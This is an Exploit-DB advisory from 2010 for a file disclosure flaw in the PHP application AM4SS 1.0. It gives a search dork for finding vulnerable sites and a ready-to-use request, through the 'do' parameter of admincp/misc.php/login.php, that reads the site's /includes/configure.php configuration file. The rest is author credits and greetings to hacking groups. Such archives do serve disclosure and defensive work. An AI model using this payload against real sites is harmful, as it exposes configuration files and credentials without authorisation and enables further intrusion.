Advneced Management For Services Sites - File Disclosure

EDB-ID:

12859

CVE:

N/A




Platform:

PHP

Date:

2010-06-03


======================================================================= 
# Advneced Management For Services Sites (File Disclosure) Vulnerabilities 
======================================================================= 

######################################################################## 
# Vendor: http://www.AM4SS.com/ 
# Date: 2010-05-27 
# Author : indoushka 
# Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com ! 
# Contact : indoushka@hotmail.com 
# Home : www.arab-blackhat.co.cc
# Dork : Powered by AM4SS 1.0 
# Bug  : File Disclosure 
# Tested on : windows SP2 Français V.(Pnx2 2.0) 
######################################################################## 
                                                                                                                                                                                                
# Exploit By indoushka 
# File Disclosure : 

in : am4ss/admincp/misc.php/login.php?do= 

Exploit : am4ss/admincp/misc.php/login.php?do=/includes/configure.php 

Example : http://[site]/am4ss/admincp/misc.php/login.php?do=/includes/configure.php 


Dz-Ghost Team : Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel :
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R * www.alkrsan.net * MR.SoOoFe * ThE g0bL!N